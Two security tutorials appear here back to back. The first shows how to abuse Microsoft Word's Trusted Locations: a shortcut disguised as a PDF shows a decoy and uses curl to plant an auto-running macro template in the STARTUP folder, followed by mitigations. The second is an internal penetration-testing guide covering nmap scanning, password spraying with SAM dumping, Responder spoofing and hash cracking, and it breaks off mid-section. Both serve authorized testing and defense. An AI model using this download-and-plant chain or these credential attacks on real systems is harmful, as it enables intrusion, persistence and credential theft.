by Adam Maraziti

Ronald Reagan once said, "Trust, but verify." That holds true even for cybersecurity. We are long past the days of relying on software companies to ship default settings with a security-first focus. It is on organizations to review administrative guides, default settings, and various best practices to securely configure new and existing software. Even then, some built-in functionality cannot be changed, and organizations are forced to get creative with solutions to mitigate the associated risks. This is usually more of an issue when a larger software company decides that a security concern is not serious enough to warrant a patch or a change in functionality, either because the product is widely used in the industry or because it is "working as intended" (as determined by the software company). One such company is Microsoft, with its suite of Office products.

This article covers some advanced topics; however, the reader should find enough information here to understand the core concepts involved. The goal is to provide some background on the product and its functionality, an in-depth look at how the software steps through its trust process, how this is exploited (including a unique attack chain), and finally some best practices an organization can use to prevent it.

Background Information

It is no secret that a very large portion of organizations use Microsoft Office products. While there is a large shift happening toward Office 365 and cloud-based usage, a substantial number of users still run Office on their local machines. The most recent user figure Microsoft reported for Office came from day 2 of its Build 2016 keynote, where a slide (Figure A) showed 1.2 billion Office users. Unofficially, that number is suspected to still be over 1 billion, and Office 365 has since grown to over 350 million subscriptions.

With that many users, exploiting one of these products gives a malicious actor a very large audience to work with. Learning how Microsoft Office products work, how threat actors can use various attack chains to exploit them, and how to mitigate those risks is arguably important for everyone, and that is the focus of the remainder of this article.

Trust Workflow in Office

Microsoft Office has been built to function a specific way and utilize what they call “Trusted Locations”.  These Trusted Locations are the main focus here, so it is important to not only understand what they are but also how they work.  The best way to explain Trusted Locations is to use Microsoft’s own definition.  “Trusted Locations is a feature of Office where files contained in these folders are assumed safe, such as files you create yourself or saved from a trustworthy source. These files bypass threat protection services, bypass file block settings, and all active content is enabled. This means files saved in Trusted Locations aren't opened in Protected View or Application Guard.”  Source: https://learn.microsoft.com/en-us/deployoffice/security/trusted-locations 

By default, Trusted Locations are configured by Microsoft for Access, Excel, PowerPoint, and Word. Project and Visio support Trusted Locations as well, but none are configured by default; they can be set up by the user or the organization. The default locations vary by product, but let's take a look at the Word default Trusted Locations (Figure B):

As shown above, there are three locations: two appear to be template related and one is for "Startup" (which will be part of our attack chain later). It is important to note that these can be changed by an organization administrator or any admin user, but, by default, these entries exist for every local install of Word. The first two, the "Templates" folders, already exist on the filesystem by default; the "Startup" folder, however, does not exist by default even though it is trusted, and that is part of what makes this exploit possible.
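On a typical per-user Click-to-Run install of Word 2016/Microsoft 365, those defaults resolve to paths similar to the following (exact paths vary by Office version and install type, so treat these as an assumption to verify in your own Trust Center):

  • User Templates: %APPDATA%\Microsoft\Templates
  • Application Templates: C:\Program Files\Microsoft Office\root\Templates
  • StartUp: %APPDATA%\Microsoft\Word\STARTUP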

Let’s dig into how Trusted Locations work.  Microsoft has provided a handy flow chart on how Word steps through the various security steps when opening a file.  Please note that the flow chart (Figure C) has steps labeled 1 through 7 that will be referenced throughout the next few paragraphs.

Step 1

When a user opens a file with a Microsoft Word-associated extension, such as .doc or .docx, step one (1) is to identify the location of the file.

Step 2

Step two (2) checks if the file is located in a Trusted Location. If so, the file will open with all Active Content enabled.  If it is not, it continues to the next step.  

Step 3

Step three (3) checks for any trusted content via digital signatures. For example, you can add a digital signature from a third-party CA or a self-signed certificate to an Access database, which essentially asserts that you believe the database is safe and can be trusted. The digital signature validates that none of the macros, code modules, or other executable components in the database have been altered. If a digital signature is trusted, the file opens with all active content enabled; otherwise, it moves on to the next step.

Step 4a-c

Step four (4) is broken down into multiple parts that all do the same thing in different ways. The configuration of your environment determines how it is processed, but essentially, this step checks your organization's policies for Trust Center configurations. The Trust Center is where everything is configured; think of it as the security settings for the software (in this case, Word). It first checks for any cloud policies (4a), then ADMX or Group Policy (4b), and finally the local Trust Center settings (4c).

Step 5a-b

Step five (5) is a subset of steps four (4) a-c. It behaves like step seven (7): if any of the policies have File Block Settings configured (Figure D) that match the file being opened, the file is blocked and nothing more is done. Otherwise, the policy configuration dictates what happens when the file is opened.

A file being blocked in this manner can result in any one of the following error messages:

  • You are attempting to open a file that is blocked by your registry policy setting.
  • You are attempting to open a file type <File Type> that has been blocked by your File Block settings in the Trust Center.
  • You are attempting to open a file that was created in an earlier version of Microsoft Office. This file type is blocked from opening in this version by your registry policy setting.
  • You are attempting to save a file that is blocked by your registry policy setting.
  • You are attempting to save a file type <File Type> that has been blocked by your File Block settings in the Trust Center.

One thing to note is that steps four (4)/five (5) and step seven (7) can be one and the same depending on the settings configured. In theory, it doesn't matter which step a setting is configured in; step seven (7) was recently added by Microsoft to help with security by default. The additional settings that can be configured in step four (4) are explained under step seven (7) below.

Step 6

Next, step six (6) checks whether the file being opened is a Trusted Document. Unless disabled by an administrator, a user who sees the Security Warning bar at the top of a document stating that macros have been disabled can, by clicking the Enable Content button (Figure E), effectively turn it into a Trusted Document. When the document is reopened, the macros are no longer blocked and the user is not notified, since they previously marked it as trusted.

Step 7

The last step, step seven (7), is to utilize the Office Default settings and configurations to open the document.  This is where some safeguards are built in by default via the Trust Center.  As mentioned previously, these precautions are not exclusive to step seven (7) but rather can be configured by policy in step four (4) as well.  Regardless, they function the same way.

Probably familiar to most, Protected View is an important security feature provided by Microsoft. It's their way of protecting your computer from harm while still giving you access to the document you downloaded from the internet. Microsoft's rationale for opening documents in Protected View is explained as follows:

“Files from the Internet and from other potentially unsafe locations can contain viruses, worms, or other kinds of malware that can harm your computer. To help protect your computer, files from these potentially unsafe locations are opened as read only or in Protected View (Figure F). By using Protected View, you can read a file, see its contents and enable editing while reducing the risks.”

Source: https://support.microsoft.com/en-us/topic/what-is-protected-view-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653 

Makes sense and honestly is super easy to configure.  In the Trust Center there is a Protected View section (Figure G) with three options:

To expand on what those Protected View Trust Center settings mean:

  • Enable Protected View for files originating from the Internet - The Internet is considered an unsafe location because of its many opportunities for malicious intent.
  • Enable Protected View for files located in potentially unsafe locations - This refers to folders on your computer or network that are considered unsafe, such as the Temporary Internet folder or other folders assigned by your administrator.
  • Enable Protected View for Outlook attachments - Attachments in emails can come from unreliable or unknown sources.

The last important setting to cover is macros. On the surface, configuring what Word should do when macros are present is simple. In the Trust Center, there is a Macro Settings section with four options - three for disabling macros and one for enabling them - and by default, Microsoft has it set to "Disable all macros with notification" (Figure H).
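For reference, on Office 2016/Microsoft 365 builds this effective setting is typically stored in the registry as the VBAWarnings value (1 = enable all, 2 = disable with notification, 3 = disable except digitally signed, 4 = disable without notification), so a quick, hedged way to check a machine is:

reg query "HKCU\Software\Microsoft\Office\16.0\Word\Security" /v VBAWarnings

(Queries the current macro setting for Word; the 16.0 version key is an assumption for Office 2016/365 installs)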

Perfect, right?  Well, yes and no.  Remember that it is important to understand the trust workflow, but not only that, how it relates to macros specifically.  The flow chart (Figure I) below shows each step and if macros are enabled or disabled in that step:

Exploiting the Trust Workflow

That has been a plethora of information about Microsoft and how its Trust Workflow operates. Now let's get into how, armed with an understanding of those inner workings, a threat actor can use a fairly simple attack chain to exploit these default configurations and run malicious code. The whole premise of this attack is to get an unsuspecting person to open a legitimate PDF file to read, all while we exploit Microsoft's Trust Workflow to plant our malicious code on their system.

Server Setup:

To get started with testing this exploit, I used Python's built-in functionality to simulate a webserver. This was done simply by navigating to the folder I wanted to treat as "web-facing", in this case C:\TrustedSite, and executing the command: python -m http.server (Figure J).

By default, the server listens on port 8000 and binds itself to all interfaces.  This can all be customized via various switches for the http.server module.  See for more information: https://docs.python.org/3/library/http.server.html 
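For instance (assuming Python 3.7 or later for the --directory flag; the bind address is a placeholder), restricting the listener to one interface and serving a specific folder could look like:

python -m http.server 8000 --bind <attacker-IP> --directory C:\TrustedSite

(Serves the C:\TrustedSite folder on port 8000, bound only to the given address)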

File Configurations:

Now that we have our website simulated, let's add the files required for the exploit. Only three files are needed: a legitimate PDF for the user to read, which will serve as our decoy, a shortcut file, and our malicious macro in the form of a Word template file (Figure K).

The first file is simple, as it is a legitimate PDF. This can literally be any PDF you want, though a threat actor would target something relevant to the individual being exploited. For our test, I decided to keep it simple and very inconspicuous (Figure L):

The next file to create is the Word template. This is pretty straightforward as well, aside from the malicious code, or whatever you want it to run via the macro. Start by creating a new blank Word file. On the Developer tab, select Macros (Figure M):

On the next screen, name the macro "autoexec". This is important, as it will auto-execute when Word is opened. This is another "special" Microsoft tidbit not everyone knows about. There are a select few auto macros preconfigured by Microsoft to perform certain functions, and in this case, we are abusing the AutoExec one. You can read about the rest here: https://learn.microsoft.com/en-us/office/vba/word/concepts/customizing-word/auto-macros

An important note from the above link about auto macros – the autoexec macro will not run automatically unless it is stored in one of the following locations: the Normal template, a template that is loaded globally through the Templates and Add-ins dialog box, or a global template stored in the folder specified as the Startup folder.  This Startup folder is what we will be targeting in our attack chain, the same Startup folder from Figure B.

After naming the macro "autoexec", select the Create button (Figure N) to open the VBA (Visual Basic for Applications) code window that will be associated with the macro.

For our malicious code, I am simply going to have it display a message. Obviously, at this point, what is chosen to execute is entirely up to the malicious actor. This exploit executes every time Word is opened, with no prompt or acceptance by the user; it just runs. VBA is a powerful scripting language that exposes numerous APIs, objects, and events, allowing a malicious actor to interact with the system from the somewhat privileged context of a trusted application. They can make use of VBA code, COM objects, OLE automation, and Win32 APIs to explore the host, access the filesystem, and run commands, meaning this could be used in a plethora of ways, but, for the purposes of this article, we will leave that up to the person running it.

Our VBA code is super simple (Figure O), but here is what each item does. Sub and End Sub designate a procedure that executes; all procedures start and end with those. "autoexec()" signifies that the built-in AutoExec behavior is used, which in this case fires when you start Word or load a global template. You can ignore the lines with an apostrophe (') before them, as those are comments and do not execute (shown as green text). The code we want to run, in this case a simple message box, is dictated by MsgBox followed by whatever you want it to say between the quotes. Lastly, vbMsgBoxSetForeground just ensures that the box is shown in the foreground and not behind any other windows. All together, it looks like the following:
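A minimal reconstruction of that macro (the exact message string in Figure O is the author's; the text below is only a placeholder):

Sub autoexec()
    ' Runs automatically when Word starts or a global template is loaded
    ' MsgBox is a harmless stand-in for whatever the macro is meant to do
    MsgBox "Hello from the Startup template", vbMsgBoxSetForeground
End Sub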

Now that our macro is complete, we can hit the save button and exit the code window, which drops us back to our original, empty Word document. We now need to save this document as a "Word Macro-Enabled Template (*.dotm)" (Figure P). You can name it anything you would like, but in our case, I named it Package.dotm.

While you can save this anywhere you would like, the Microsoft default location drops you into a Custom Office Templates folder under your Documents folder (Figure Q).

Package Shortcut:

Now that we have our malicious template and simulated webserver, it is time to expand the attack chain and auto-execute as much as possible without the user knowing. How, you may ask? Simple: a shortcut file, or more specifically a .LNK. The functionality of a shortcut file may surprise you. Simply put, a LNK file is a Windows shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. That means we can call an application like PowerShell or CMD. Also important to note as we progress: with the release of Windows 10 Insider build 17063 back in 2017, Windows began shipping curl and tar executables that can be run directly from CMD or PowerShell, and they are still present today. Knowing this, let's dig in and use that functionality in our exploit.

Let's start by creating a simple shortcut file: right-click anywhere in a folder or on the desktop and select New > Shortcut. You will be prompted for the location of the item you want a shortcut to. For now, put in the location of CMD, which by default is C:\Windows\System32\cmd.exe (Figure R).


On the next page, name it whatever you want. You now have a shortcut file that opens a command prompt. That will be the base of our shortcut; we now need to add to the shortcut's target to make it do what we want. Let's dive into the code piece by piece and explain what it does.

Here is the code that we will utilize (Figure S):

C:\Windows\System32\cmd.exe /q /c 

This executes CMD. The /q switch turns echo off (quiet mode), and /c tells CMD to run the command string and then terminate, so the window closes once the commands complete.

explorer http://localhost:8000/DecoyFile.pdf &

This part uses Windows Explorer to open the designated URL. In this case, it points to our legitimate PDF, so the user is served something they are expecting; the PDF opens in the default browser or the user's configured PDF reading application. The & chains the next command.

 mkdir %appdata%\Microsoft\Word\STARTUP & 

This command runs mkdir, which creates a folder if one does not already exist. In this case, we are telling the computer to create the folder at Microsoft's default Trusted Location for Word Startup (Figure B). Although the location is trusted by default, the actual folder does not exist by default, so we need to ensure it is there. Again, & continues to the next command.

curl -o %appdata%\Microsoft\Word\STARTUP\Package.dotm  http://localhost:8000/Package.dotm

Next, we use that handy functionality Microsoft added and curl the file down. Curl, short for Client URL, is a command line tool that enables data transfer over various network protocols. Here, we point curl at the template hosted on our simulated webserver and tell it to output (-o) that file into the newly created (or already existing) Startup folder in the Trusted Location.

We will now add that code to our shortcut by right-clicking the shortcut file we created and selecting Properties. In there is a Target box that currently points to CMD; we can append the remainder of the code to it (Figure T).
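Assembled in the Target field, the full one-liner built from the pieces above looks roughly like this (localhost:8000 would be the attacker's server in a real chain):

C:\Windows\System32\cmd.exe /q /c explorer http://localhost:8000/DecoyFile.pdf & mkdir %appdata%\Microsoft\Word\STARTUP & curl -o %appdata%\Microsoft\Word\STARTUP\Package.dotm http://localhost:8000/Package.dotm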

With that being completed, we now have our three files needed to complete this exploit of Trusted Locations in Word.  The goal at this point would be for the target to open the shortcut file thinking it was a legitimate shortcut to a PDF they needed or wanted to view.  A threat actor will, in most cases, disguise the shortcut link as best as possible by naming it something relevant to the user (spear phishing) or changing the shortcut link icon associated with the file to look like a PDF (Acrobat icon).  The goal of all phishing is to get the user to interact with the content and how you get a user to do that is an art on its own, if you will.  For this we will leave a little guesswork up to the reader, however, we will go into detail on how it works when executed.

End Results:

When the LNK shortcut file is clicked, the user sees the legitimate PDF displayed, and nothing else. In reality, CMD executes the series of commands in the background: it creates a Startup folder in the default Trusted Location, then copies a Word template file into that folder. At that point, the attack is essentially staged and looks like this (Figure U):

This is what the user can't see executing in the background when that LNK shortcut file is run (Figure V). Because of the switches we use, the CMD window is never seen or, worst case, flashes briefly on screen. This depends on the user's default browser settings, specifically whether it opens maximized; if it does, the CMD window will always be behind the PDF:

Now when the user goes to open Word or any Word-associated file after that point, the malicious macro in the template file will auto execute every single time.  Here is the result of our test (Figure X):

Obviously, this is not malicious the way it is configured, however, a malicious actor could configure the macro to essentially do anything it wanted to within the limitations of VBA.  This works almost too well because of these Trusted Locations and the ability for a basic user with no privileges to create the folder needed to complete this.  As we saw previously, Word executes the macro and bypasses essentially all Trust Center security simply by being in a Trusted Location. There is no notification of a macro being used and no notification from Protected View saying it was downloaded from the internet.

As long as the template file exists, that popup will continue to appear on launch. A couple of things to note, however: it will not execute for each instance of Word that is opened, only the first one. So if you open a second Word document while the first is still open, the macro does not execute again. Additionally, deleting the template file from the Startup folder does NOT remove the macro; the macro still exists even when that template isn't loaded and has to be manually deleted from the Macros section within Word. You then have to remove the template file as well to fully get rid of it. It can be a little annoying if not removed properly.

Wrap Up

One thing I want to make sure I cover is how to mitigate this risk since, essentially, Microsoft does not see it as an issue. The foolproof method is to remove all Trusted Locations, either by Group Policy or ADMX templates; both are viable. There are other ways to mitigate the risk, such as monitoring those default locations for modifications or using third-party software. The best solution for your organization may not be the best for every organization.
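As a rough illustration only (the policy value name below is an assumption based on the "Disable all Trusted Locations" Trust Center checkbox and should be verified against your Office version, ideally deployed via Group Policy rather than direct registry edits), removing trust from all Word Trusted Locations and spot-checking the abused folder could look like:

reg add "HKCU\Software\Policies\Microsoft\Office\16.0\Word\Security\Trusted Locations" /v AllLocationsDisabled /t REG_DWORD /d 1 /f

(Sets the assumed registry equivalent of disabling all Trusted Locations for Word 2016/365)

dir "%appdata%\Microsoft\Word\STARTUP"

(Quick audit of the Startup Trusted Location abused in this attack chain for unexpected template files)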

While none of this has been earth-shattering, if you will, it is a fun way to look at an attack chain that uses built-in functionality and default configurations. Given how large the product suite is, this can be replicated across all four applications with default Trusted Locations (Word, Excel, PowerPoint, and Access), and there is a good chance these settings are not being locked down by organizations. Most see that macros are disabled and think that mitigates the risk; understanding the Trust Workflow, however, shows that there are ways to bypass those settings regardless.

by Dimitris Pallis

Connectivity Basics

Before jumping on to exploitation tools and techniques, the most important step is to connect to the client's network.

This can be done in two ways: either remotely or on-site at the client's offices. On-site visits require your own dedicated space and access to the client's network through a wired Ethernet or wireless connection. After that, you only have to confirm you have been assigned an IP address and you're ready to go. Other measures may be required, such as whitelisting your computer's MAC address, but those details should be handled during the scoping process and you'll know beforehand; if you don't, just ask the project manager, who will confirm with the client.

Most of the time, the client agrees to a remote internal assessment. This can be achieved by providing them with a virtual machine, which the client spins up on their internal network before giving you its IP address. This machine could include a local Nessus installation and other tools such as Responder and Crackmapexec. Finally, you can use the X2Go client to connect to that virtual machine over SSH (example below).

X2go client tool

Sometimes, to be able to reach the virtual machine on the client's network, we might need VPN access first. Again, during the scoping process, the client should have indicated on the Statement of Work that a VPN connection is required and should provide valid credentials and instructions for the VPN client software required to connect (Fortigate, Pulse Secure, etc.).

More Advanced Ways of Working

If you prefer to work on the command line, you can simply SSH in rather than using X2Go. SSH's -D flag is useful for creating a SOCKS proxy over the SSH tunnel; tools like Burp and proxychains on your local machine can then be configured to send requests via the virtual machine, letting you use your local setup. You can also access Nessus from your laptop by setting up port forwarding over SSH.
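For example, reusing the root account from the scp command below, the two setups might look like this (the local ports are arbitrary placeholders):

ssh -D 1080 root@<ATTACKBOX-IP>

(Opens a SOCKS proxy on local port 1080 that tunnels traffic through the attack VM; point proxychains or Burp's SOCKS settings at 127.0.0.1:1080)

ssh -L 8834:127.0.0.1:8834 root@<ATTACKBOX-IP>

(Forwards local port 8834 to the VM's Nessus web interface so you can browse to https://localhost:8834 from your own laptop)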

Exporting Files

When our assessment is done and we need to export our screenshots and results, we can compress our client folder on the virtual machine and then use scp from our local machine to transfer that folder over:

scp root@<ATTACKBOX-IP>:/home/pentest/Documents/CLIENT-FOLDER.ZIP ~/Documents/

First Foothold & Steps

If you have been involved in an internal penetration test before, you'll know there are two big misconceptions about internal assessments: the first is running Nessus, exporting the results and calling it a day; the second is achieving Domain Administrator and calling it a day. Both are just means to an end, the real goal being to identify every possible attack vector a real attacker could follow to compromise our client's network.

Having said that, as soon as we connect to our attacker box to start testing, we can't just jump to adding a new DA account; we need to do some privilege escalation and lateral movement first. At the start of every internal, our first goal is to get a foothold on the network. Remember that the attacking VM is the equivalent of going to our client's offices and plugging one of their Ethernet cables into our computer; the only knowledge we have is our target scope. So a first foothold on the network means acquiring valid domain account credentials or, at minimum, access to a machine that allows us to extract local account credentials from memory.

As of 2022, there are five main vulnerabilities that could give us our first foothold on an internal network:

  1. Missing patches (BlueKeep, ZeroLogon, EternalBlue, and others with public exploits)
  2. Outdated Software (Java JMX, Jenkins with RCE, etc.)
  3. Weak Password Policy & Reuse (e.g. Spraying with Password2022! against user list or Administrator:Administrator on RDP/SMB)
  4. WPAD/LLMNR/IPv6 Spoofing (Cracking captured NetNTLMv2 hashes)
  5. SMB Signing Not Required (Relaying captured hashes to hosts)

Note: If a VPN connection is required to connect to our client's network, they might provide us with valid domain credentials. Using these credentials as a first foothold to move laterally into the network is basically cheating, as we did not exploit any of the vulnerabilities mentioned above and we can't demonstrate the risk. Suppose our internal consists of seven days (five days of testing and two of reporting); if we can't get our first foothold in the first two days, we can kindly ask the client to provide us with a domain account so that we save time by assuming we got our first foothold (since we don't have the unlimited time a real adversary would have). We make sure to mention that in the final report, of course.

Automated Scanning

Vulnerabilities 1, 2 and 5 above can and will be discovered by our Nessus scans (plus Nmap), so as a first step after connecting to our attacker box, browse to https://0.0.0.0:8834, which is where Nessus should be running locally (we can confirm it is by running sudo /etc/init.d/nessusd status), and log in with the correct credentials.

As soon as you do, go to New Scan in the top right corner and click Advanced Scan, where you'll have the option to paste your client's target list and change basic settings such as the scan name, discovery options and schedule (you can pre-configure those during your set-up day so the scan starts at 8:30 a.m. on the first day of testing and you don't lose precious time). There is no perfect configuration for Nessus; however, you can try importing plugins and leaving out some unnecessary findings.

We'll let Nessus do its thing; in the meantime, we'll create a folder with our client's name (and within it, two subfolders named scans and screens) so we gather all findings there. As soon as we do that, we'll press CTRL + SHIFT + T in our terminal six times to open six tabs for the six different Nmap scans we'll run:

Disclaimer: Nessus scans will most likely find the same results but it's good to double check and refer to them locally without having to open the Nessus report every time. Also, every analyst is different and may have their own methodology; use this guide as a reference and, eventually, see whatever works best for you.

Note: the -oN option outputs results in normal format; you could use -oG instead for greppable output, or -oA for normal, greppable and XML at the same time.

nmap -Pn -F -iL targets.txt -oN general-scans.txt --open

(Will perform a fast scan of the top 1000 open ports without pinging the hosts and save results in normal format)

nmap -Pn -sV -p 80,8080,443,19000,20300,7004,7778,7779,8019,8090,8443,8989,90,9095,9704,5000,450 --script=http-enum.nse -iL targets.txt --open -oN web-apps.txt

(Will scan for, grab the banner and enumerate the given open web server ports without pinging the hosts and save the results to a normal format)

nmap -Pn -sV -p 3389,1433,3306,445,139 -iL targets.txt -oN services.txt --open

(Will scan and grab the banner for open RDP, SMB, SQL Server, MySQL ports without pinging the hosts and save to normal format)

nmap -Pn -sV -p 21,22,23,25 -iL targets.txt --open -oN brute.txt

(Will scan and grab the banner for brute-forceable open FTP, SSH, TELNET, IMAP ports without pinging the hosts and save to normal format)

nmap -Pn -sV -p 21,23,80,8080,110,143,1521 -iL targets.txt --open -oN plaintext.txt

(Will scan and grab the banner for plaintext open FTP, TELNET, HTTP ports without pinging the hosts and save to normal format)

nmap -Pn -p 445 -iL targets.txt --script smb-security-mode.nse --open -oN nosign.txt

(Will scan for open SMB servers that do not require SMB signing without pinging the hosts and save to normal format. Using the Kali tools, this can also be achieved with Crackmapexec by running the command below)

crackmapexec smb <IP-ranges or SMBservers.txt> --gen-relay-list relayTargets.txt

Nmap results

We'll keep the list of SMB servers that don't require signing on file for now (until our relaying attacks). Nessus will have generated a few results by this point, and it's time for us to review them. The next part is pretty straightforward: we will review the Nessus and Nmap results for versions vulnerable to public exploits and determine whether they can get us our first foothold. We will also note misconfigurations that could help in getting access to victim hosts, such as null sessions on SMB servers or anonymous FTP access.

Nessus results

We can use Google to search software versions for public exploits or, by clicking on the vulnerability in Nessus, get the CVE and details on whether a public exploit exists.

Both Nmap and Nessus will give us a list of web servers, and good enumeration practice is to collect a screenshot of every web server on the network so we don't have to manually visit each one when an Apache exploit turns up, or dig through all the Nessus results to find that Jenkins instance. The screenshots will also be useful for password spraying attacks later if there are brute-forceable login panels.

We can use the Gowitness tool (install it and have a quick look at its GitHub page) to gather these screenshots, but first we need to gather all web servers in XML format, otherwise Gowitness won't understand the input file:

nmap -Pn -p <WEBSERVERPORTS> -iL targets.txt --open -oX webscreens

(Scans for open web server ports and saves results in XML format)

gowitness nmap --file webscreens -P ~/Documents/CLIENTNAME/internal -X 1280 -Y 720

(Grabs screenshots of web server ports indicated on nmap's XML file and saves them to "internal" folder on 1280x720 resolution)

That covers outdated software and missing patches (vulnerabilities 1 and 2); next up is "Weak Password Policy & Reuse" (vulnerability 3 on the first-foothold list). If you believe I have missed something, feel free to ping me at dmitris@protonmail.com. If you do detect generic findings that could be useful to the client, such as SMB version 1, default SNMP strings or unrestricted PowerShell, you will, of course, report them; however, this guide focuses mostly on getting your first foothold.

Password Spraying

Weak passwords and their reuse across multiple domain or local accounts are your best mate when you're testing networks with a robust patching policy or when everything else has failed (LLMNR/IPv6 disabled, or signing required on all hosts so no relaying). There are multiple services we can spray passwords against, including internal OWA and SSH, but the elephant in the room is Server Message Block (SMB). If SMB is not available on a host but Remote Desktop Protocol (RDP) is, we can spray against RDP instead using Hydra.

Note: Be aware of the lockout policy! Domain accounts could be locked out on the 3rd invalid attempt for 15 minutes. Make sure to spray a maximum of two passwords per account every 45 minutes, or check whether the tool you're using to spray has an option for the same.
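A hedged way to check that policy before spraying (assuming null sessions are permitted against the domain controller; otherwise valid credentials are needed):

crackmapexec smb <DC-IP> -u '' -p '' --pass-pol

(Attempts to read the domain password and lockout policy, including the lockout threshold and duration, over a null SMB session)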

We already have a list of open SMB ports through our Nmap scans above or we can head to Nessus and filter search by ports 139 and 445. There should be an informational finding about "services report" including SMB servers (SMB signing is irrelevant at this stage since we'll spray passwords not relay them). All we need at this moment is a list of (potentially) valid usernames we can spray against. Several valid usernames can be discovered through enumerating LDAP or SMB and potentially valid usernames can be generated through online OSINT and adjusted to the correct format:

nmap -n -sV --script "ldap* and not brute" -p 389 <domain-controller-ip>

ldapsearch -x -h <ip> -s base

(Enumerating LDAP for valid usernames without providing a user list)

The usernames we can get by enumerating LDAP may be minimal so we'll have to do some online OSINT in order to generate a list of usernames and password spray them all or remove the false positives first and then spray them against a weak password. The tool we are going to use to generate a list of usernames is CrossLinked. This tool grabs employee names from LinkedIn and generates a list of email accounts according to the format we have provided it with:

python3 crosslinked.py -f '{f}{last}@clientcompany.com' "clientcompany" -o ~/Documents/internal/users.txt

(Will generate and save a list of client company employees in the format of first letter of first name followed by last name, e.g., dpallis@clientcompany.com)

This is the format commonly found within Active Directory environments, and it can be determined in lots of ways, such as discovering one username through LDAP enumeration, capturing a hash through spoofing (as we'll see below), or spraying an internal OWA with a tool like Metasploit. As soon as we discover the format and generate a list of user accounts through Crosslinked (don't forget to keep the username only and cut the "@domain.com" part - cat users.txt | cut -d "@" -f1 > justusers.txt), we can determine their validity by querying Kerberos (search in Nessus for hosts with port 88 open to detect Kerberos):

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm="<Domain_Name>",userdb=justusers.txt <IP>

Instead of Nmap, we can also install and use the Kerbrute tool, which is built for this purpose. If our password spraying attempts are successful and we obtain valid domain credentials, we can then easily pull a list of all domain accounts. Since we have not achieved that yet, let's proceed with the actual spraying. The popular tool Crackmapexec, already found on our Kali, can be used to spray against both local and domain accounts using the user list we generated above and the list of hosts with open SMB servers:

crackmapexec smb <IP> -u justusers.txt -p Password@2022 --sam --continue-on-success

(Will try to authenticate all users within justusers.txt against the weak password "Password@2022" on one specified host and dump the SAM database) 

Example:

Dumping SAM with Crackmapexec

If Crackmapexec manages to discover multiple accounts using the same password "Password@2022", we have "Password Reuse", which is considered a High risk finding in our report. Generating and spraying against potentially valid domain accounts is an essential step of our methodology; however, it is often the case that we also have local password reuse for administrative accounts on multiple hosts. Crackmapexec can identify those accounts as well and again retrieve the SAM database, providing us with a quick win:

crackmapexec smb <IP-list> -u Administrator -p Administrator --sam --local-auth --continue-on-success

(Will try to authenticate the local "Administrator" user against the weak password "Administrator" on the given hosts list and dump the SAM database)

In this case, we've provided Crackmapexec with a list of all open SMB servers, as Administrator is a local account and we do not have to worry about lockouts when it's sprayed on multiple hosts. There's also the case that some hosts might not have SMB enabled but instead use Remote Desktop Protocol (RDP). Respecting the same rules on domain account lockouts that we saw above, we can try spraying against the RDP service with the local Administrator or the accounts on our generated list using the Hydra tool:

hydra -t 1 -V -l Administrator -p Administrator rdp://<IP>

(Will brute force the local Administrator account (-l) with the single password "Administrator" (-p) against the provided IP address and give verbose results; use -L/-P with files to spray lists of users or passwords)

Wrapping up password spraying: as mentioned above, if we get lucky and obtain valid account credentials, we can still use Crackmapexec to dump SAM databases from hosts where our credentials work, download all domain accounts, retrieve the password policy and report on it, try Kerberoasting, or run BloodHound to find the quickest path to Domain Admin, among other attacks. You could also refer to the attack graph linked in the references for further attacks after obtaining valid domain credentials.
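As a rough illustration of those follow-up steps (tool names as packaged on Kali; the domain, account and DC address are placeholders):

crackmapexec smb <DC-IP> -u <user> -p <password> --users --pass-pol

(Enumerates domain users and retrieves the password/lockout policy with our newly obtained credentials)

impacket-GetUserSPNs <DOMAIN>/<user>:<password> -dc-ip <DC-IP> -request

(Requests service tickets for Kerberoastable accounts so the resulting hashes can be fed to Hashcat)

bloodhound-python -d <DOMAIN> -u <user> -p <password> -ns <DC-IP> -c All

(Collects Active Directory data for BloodHound to map the shortest paths to Domain Admin)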

Spoofing

By default, Windows systems use the following priority list while attempting to resolve name resolution requests through network based protocols:

  1. DNS
  2. Link-Local Multicast Name Resolution (LLMNR for short) protocol
  3. NetBIOS Name Service (NBT-NS) protocol

When a DNS lookup fails, Windows systems fall back to LLMNR and NetBIOS Name Service (NBT-NS) for name resolution. They send an unauthenticated UDP broadcast to the network asking if any other system has the name they're looking for. Because this process is unauthenticated and broadcast to the whole network, any machine on the network can respond and claim to be the target machine.

By listening for LLMNR and NetBIOS broadcasts, an attacker can masquerade as (spoof) the machine the client is trying to authenticate with. After accepting the connection, a tool like Responder can forward the request to a rogue service (such as SMB) that performs the authentication process. During that authentication, the victim sends our rogue server a NetNTLMv2 hash for the user trying to authenticate. Responder captures these NetNTLMv2 hashes. You cannot use them for Pass-the-Hash attacks, but you can crack them or relay them to other machines.

sudo responder -I eth0 

(Listens for LLMNR/NBT-NS broadcasts, where -I is your internal network interface)

Captured NetNTLMv2 hash

Also, Web Proxy Auto-Discovery (WPAD) is a protocol used for discovering web proxies on the network. By default, Windows is configured to ask the domain for the location of a configuration file Proxy Auto Config (PAC) that contains the information for a Web proxy to use on the network.

Automatic discovery of the PAC file is useful in an organization because the device will send out a broadcast asking for the proxy file and receive one. However, it naturally does not authenticate who is sending the proxy file, allowing an attacker to send a spoofed answer, which then asks for credentials.

Responder will run a fake HTTP server and act as if it is serving the proxy for the network, so victims get a basic authentication box popping up on their machine. Most people who are just trying to get to work will type in their username/password without thinking twice about it. This results in no internet access for them while the attack is ongoing; once we cancel it, they have access to the network as usual.

sudo responder -I eth0 --wpad

(Listens for broadcasts and enforces WPAD spoofing)

What the victim sees during a WPAD spoofing attempt

Now we should see some hashes (NetNTLMv2) captured. The captured hashes are written to Responder's logs folder (/usr/share/responder/logs).

At this point, we have two options: either relay the hash, which we'll see later on, or crack it using Hashcat, a tool that ships with Kali Linux:

hashcat -m 5600 ~/TMP/dimitris/hash.txt  wordlist.dic -O -w3 -r /opt/hashcat/rules/cracker.rule

(Will attempt to crack NetNTLMv2 (-m 5600) hashes with kernel optimization (-O) using the specified rule file and wordlist)

Note that dumping the SAM database with Crackmapexec gives you NTLM hashes, which fall under the -m 1000 mode, not NetNTLMv1 or v2. Moving on to IPv6 spoofing:

